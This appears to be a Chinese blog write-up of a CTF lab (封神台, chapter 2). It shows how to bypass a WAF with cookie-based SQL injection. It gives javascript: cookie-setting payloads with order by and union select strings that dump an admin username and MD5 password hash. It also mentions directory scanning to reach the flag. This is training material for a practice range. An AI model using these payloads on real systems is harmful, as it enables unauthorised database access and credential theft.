CTF封神台 第二章:遇到阻难!绕过WAF过滤!

靶场:封神台
工具:聪明的大脑

我们在进行SQL注入渗透测试的时候,往往会碰到以下这种情况

那么这种情况下我们就不得不了解一下cookie注入了。众所周知,cookie是用来验证身份的,那如果我们把注入参数塞到cookie里面,是不是就可以轻松的绕过了,废话不多说,我们开始实战

首先F12呼出控制台

在里面输入这串代码

javascript:alert(document.cookie="id="+escape("171"));javascript:alert(document.cookie="id="+escape("ID+注入参数"));

然后把地址栏里的id全部去掉

看看会不会正常显示id为171的内容

可以看出来存在cookie注入漏洞,接下来我们就可以往里面输入注入参数了

注入参数跟SQL注入没什么区别

javascript:alert(document.cookie="id="+escape("171+order+by+10"));

存在10个字段

javascript:alert(document.cookie="id="+escape("171+union+select+1,2,3,4,5,6,7,8,9,10+from+admin"));

发现

2,3,7,8,9字段可以注入

javascript:alert(document.cookie="id="+escape("171+union+select+1,username,password,4,5,6,7,8,9,10+from+admin"));

得到账号密码

admin和b9a2a2b5dffb918c(MD5解密为welcome)

然后我们拿目录扫描工具(dirsearch、菜刀爬站版、御剑等)FUZZ一下

看到admin路径

最后成功拿到flag

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值